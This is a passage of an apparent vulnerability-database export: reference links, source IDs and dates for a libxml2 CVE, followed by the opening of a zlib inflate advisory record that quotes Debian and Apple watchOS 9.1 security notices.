"url": "https://packetstormsecurity.com/files/159851/red-hat-security-advisory-2020-4479-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1242"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021041514"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1826/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159639/gentoo-linux-security-advisory-202010-04.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3102/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3550"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/161916/red-hat-security-advisory-2021-0949-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-rackswitch-firmware-products-are-affected-by-vulnerabilities-in-libxml2/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-multiple-vulnerabilities-5/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3631/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3364/"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20907"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2019-20907"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-1971"
},
{
"trust": 0.5,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.4,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17006"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5188"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-12749"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-12401"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1971"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14866"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-17006"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-11719"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-17023"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17023"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12243"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12749"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-6829"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-14866"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-8177"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-12403"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12400"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11756"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-11756"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-12243"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-12400"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-11727"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11719"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5094"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11727"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-5188"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-5094"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-17498"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17498"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-12402"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-20454"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19221"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19906"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13050"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-16168"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-9327"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-13630"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-20387"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5018"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20218"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-13050"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-14889"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-1730"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-16935"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-19906"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-13627"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-19221"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-6405"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-13631"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20387"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-5018"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-13632"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14422"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13627"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14889"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16935"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-20218"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20454"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16168"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12402"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12401"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12403"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20916"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13631"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14422"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13632"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-8492"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13630"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1730"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-20916"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2017-12652"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17546"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14973"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-17546"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12652"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14973"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-5313"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1751"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-24659"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1752"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-10029"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-19126"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19126"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/835.html"
},
{
"trust": 0.1,
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=949582"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20305"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.5/html/serverless_applications/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1000858"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3115"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9327"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3114"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000858"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2021"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8492"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-6405"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3449"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3450"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:1079"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8625"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15999"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20228"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3156"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3447"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5313"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20191"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20180"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15999"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20178"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17450"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9925"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9802"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9895"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8625"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:0190"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-15165"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14382"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8812"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3899"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11068"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8819"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3867"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9893"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8808"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18197"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3902"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-18197"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3900"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8743"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9805"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8820"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9807"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8769"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8813"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9850"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8811"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9803"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9862"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-1551"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3885"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17450"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15503"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20807"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10018"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-1551"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8835"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8764"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8844"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3865"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3864"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14391"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3862"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3901"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.6/updating/updating-cluster"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8823"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-rel"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3895"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15165"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-11793"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9894"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8816"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8771"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3897"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8814"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8743"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9915"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8815"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8625"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8783"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20807"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27813"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-11068"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8766"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3868"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8846"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3894"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25211"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:1129"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12723"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25645"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_3scale_api_management"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25656"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28374"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14351"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25705"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_3scale_api_management/2.10/html-single/installing_3scale/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29661"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20265"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-0427"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14351"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-19532"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12723"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7053"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14040"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14040"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9283"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-0427"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19532"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1240"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20386"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-18874"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12450"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4255"
},
{
"trust": 0.1,
"url": "https://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14822"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14822"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20386"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18874"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14365"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-5482"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5482"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12450"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#low"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:0949"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8177"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.4/cli_reference/openshift_developer_cli/installing-odo.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-6829"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4479"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3996"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.9_release_notes/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1752"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:0146"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28362"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless_applications/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24553"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24553"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10029"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24659"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1751"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28366"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28362"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28366"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28367"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28367"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-185720"
},
{
"db": "VULMON",
"id": "CVE-2020-7595"
},
{
"db": "PACKETSTORM",
"id": "162694"
},
{
"db": "PACKETSTORM",
"id": "162142"
},
{
"db": "PACKETSTORM",
"id": "159639"
},
{
"db": "PACKETSTORM",
"id": "161016"
},
{
"db": "PACKETSTORM",
"id": "162130"
},
{
"db": "PACKETSTORM",
"id": "159553"
},
{
"db": "PACKETSTORM",
"id": "161916"
},
{
"db": "PACKETSTORM",
"id": "159851"
},
{
"db": "PACKETSTORM",
"id": "159349"
},
{
"db": "PACKETSTORM",
"id": "160961"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-965"
},
{
"db": "NVD",
"id": "CVE-2020-7595"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-185720",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2020-7595",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162694",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162142",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159639",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "161016",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162130",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159553",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "161916",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159851",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159349",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "160961",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202001-965",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-7595",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-01-21T00:00:00",
"db": "VULHUB",
"id": "VHN-185720",
"ident": null
},
{
"date": "2020-01-21T00:00:00",
"db": "VULMON",
"id": "CVE-2020-7595",
"ident": null
},
{
"date": "2021-05-19T14:19:18",
"db": "PACKETSTORM",
"id": "162694",
"ident": null
},
{
"date": "2021-04-09T15:06:13",
"db": "PACKETSTORM",
"id": "162142",
"ident": null
},
{
"date": "2020-10-20T20:13:39",
"db": "PACKETSTORM",
"id": "159639",
"ident": null
},
{
"date": "2021-01-19T14:45:45",
"db": "PACKETSTORM",
"id": "161016",
"ident": null
},
{
"date": "2021-04-08T14:00:00",
"db": "PACKETSTORM",
"id": "162130",
"ident": null
},
{
"date": "2020-10-14T16:52:18",
"db": "PACKETSTORM",
"id": "159553",
"ident": null
},
{
"date": "2021-03-22T15:36:55",
"db": "PACKETSTORM",
"id": "161916",
"ident": null
},
{
"date": "2020-11-04T15:29:08",
"db": "PACKETSTORM",
"id": "159851",
"ident": null
},
{
"date": "2020-09-30T15:43:22",
"db": "PACKETSTORM",
"id": "159349",
"ident": null
},
{
"date": "2021-01-15T15:06:55",
"db": "PACKETSTORM",
"id": "160961",
"ident": null
},
{
"date": "2020-01-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-965",
"ident": null
},
{
"date": "2020-01-21T23:15:13.867000",
"db": "NVD",
"id": "CVE-2020-7595",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2022-07-25T00:00:00",
"db": "VULHUB",
"id": "VHN-185720",
"ident": null
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2020-7595",
"ident": null
},
{
"date": "2023-06-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-965",
"ident": null
},
{
"date": "2025-12-03T16:15:54.123000",
"db": "NVD",
"id": "CVE-2020-7595",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202001-965"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "libxml2 Security hole",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202001-965"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202001-965"
}
],
"trust": 0.6
}
}
VAR-202208-0404
Vulnerability from variot - Updated: 2026-03-09 20:18zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).
For the stable distribution (bullseye), this problem has been fixed in version 1:1.2.11.dfsg-2+deb11u2.
We recommend that you upgrade your zlib packages. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
APPLE-SA-2022-10-27-12 Additional information for APPLE-SA-2022-10-24-5 watchOS 9.1
watchOS 9.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213491.
AppleMobileFileIntegrity Available for: Apple Watch Series 4 and later Impact: An app may be able to modify protected parts of the file system Description: This issue was addressed by removing additional entitlements. CVE-2022-42825: Mickey Jin (@patch1t)
Apple Neural Engine Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-32932: Mohamed Ghannam (@_simo36) Entry added October 27, 2022
Audio Available for: Apple Watch Series 4 and later Impact: Parsing a maliciously crafted audio file may lead to disclosure of user information Description: The issue was addressed with improved memory handling. CVE-2022-42798: Anonymous working with Trend Micro Zero Day Initiative Entry added October 27, 2022
AVEVideoEncoder Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved bounds checks. CVE-2022-32940: ABC Research s.r.o.
CFNetwork Available for: Apple Watch Series 4 and later Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution Description: A certificate validation issue existed in the handling of WKWebView. This issue was addressed with improved validation. CVE-2022-42813: Jonathan Zhang of Open Computing Facility (ocf.berkeley.edu)
GPU Drivers Available for: Apple Watch Series 4 and later Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2022-32947: Asahi Lina (@LinaAsahi)
